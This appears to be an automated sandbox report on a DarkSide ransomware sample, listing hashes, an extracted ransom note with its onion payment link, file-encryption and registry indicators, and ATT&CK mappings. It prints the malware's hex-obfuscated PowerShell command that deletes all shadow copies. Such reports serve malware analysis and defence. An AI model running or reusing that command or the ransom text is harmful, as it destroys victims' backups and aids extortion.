darkside | 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60

General

Target

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Size

59KB
MD5

0ed51a595631e9b4d60896ab5573332f
SHA1

7ae73b5e1622049380c9b615ce3b7f636665584b
SHA256

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60
SHA512

9bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\\README.21b2020d.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW When you open our website, put the following data in the input form: Key: 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside

Modifies extensions of user files 12 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\ShowStep.tif => C:\Users\Admin\Pictures\ShowStep.tif.21b2020d	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
File renamed	C:\Users\Admin\Pictures\TestRestore.tif => C:\Users\Admin\Pictures\TestRestore.tif.21b2020d	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromStop.raw => C:\Users\Admin\Pictures\ConvertFromStop.raw.21b2020d	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
File opened for modification	C:\Users\Admin\Pictures\ConvertFromStop.raw.21b2020d	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
File renamed	C:\Users\Admin\Pictures\DenyRevoke.crw => C:\Users\Admin\Pictures\DenyRevoke.crw.21b2020d	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
File renamed	C:\Users\Admin\Pictures\ExportWrite.crw => C:\Users\Admin\Pictures\ExportWrite.crw.21b2020d	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
File opened for modification	C:\Users\Admin\Pictures\ExportWrite.crw.21b2020d	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
File opened for modification	C:\Users\Admin\Pictures\RenameUse.crw.21b2020d	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
File opened for modification	C:\Users\Admin\Pictures\TestRestore.tif.21b2020d	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
File opened for modification	C:\Users\Admin\Pictures\DenyRevoke.crw.21b2020d	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
File renamed	C:\Users\Admin\Pictures\RenameUse.crw => C:\Users\Admin\Pictures\RenameUse.crw.21b2020d	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
File opened for modification	C:\Users\Admin\Pictures\ShowStep.tif.21b2020d	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\21b2020d.BMP"	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\21b2020d.BMP"	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

Modifies Control Panel 1 IoCs

evasion

Processes:

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallpaperStyle = "10"	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

Modifies registry class 5 IoCs

Processes:

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\21b2020d.ico"	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d\ = "21b2020d"	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exe243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

pid	process
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exepowershell.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeSecurityPrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeTakeOwnershipPrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeLoadDriverPrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeSystemProfilePrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeSystemtimePrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeProfSingleProcessPrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeIncBasePriorityPrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeCreatePagefilePrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeBackupPrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeRestorePrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeShutdownPrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeDebugPrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeSystemEnvironmentPrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeRemoteShutdownPrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeUndockPrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeManageVolumePrivilege	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: 33	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: 34	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: 35	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: 36	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeDebugPrivilege	3176	powershell.exe
Token: SeBackupPrivilege	744	vssvc.exe
Token: SeRestorePrivilege	744	vssvc.exe
Token: SeAuditPrivilege	744	vssvc.exe

Suspicious use of WriteProcessMemory 2 IoCs

Processes:

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

description	pid	process	target process
PID 636 wrote to memory of 3176	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe	powershell.exe
PID 636 wrote to memory of 3176	636	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
"C:\Users\Admin\AppData\Local\Temp\243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe"
1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3176

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:744

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
ea6243fdb2bfcca2211884b0a21a0afc

SHA1
2eee5232ca6acc33c3e7de03900e890f4adf0f2f

SHA256
5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

SHA512
189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5e88ce17f7e5bd3e60f4b886b1a6c7d0

SHA1
e6a4235c9c3573fd56c370196f8d4674b0150ec3

SHA256
c4ee85d9ddb55c3e4afe99693b2349c8e2329d4b0fad35340b784b36547e8212

SHA512
0bda3a35c1dcccc0ebf6e2c1b5da5f78d6d6f632ceb47d87e8ec08344a6251a18ad5a881b5b04f0a60d7d94f4279b2f7ea5f848eddc7a0b770a4d6ef1e493401

Download Submit
memory/3176-114-0x0000000000000000-mapping.dmp

Download
memory/3176-120-0x000001C81A420000-0x000001C81A421000-memory.dmp

Filesize
4KB

Download
memory/3176-125-0x000001C81A5D0000-0x000001C81A5D1000-memory.dmp

Filesize
4KB

Download
memory/3176-126-0x000001C818410000-0x000001C818412000-memory.dmp

Filesize
8KB

Download
memory/3176-127-0x000001C818413000-0x000001C818415000-memory.dmp

Filesize
8KB

Download
memory/3176-136-0x000001C818416000-0x000001C818418000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads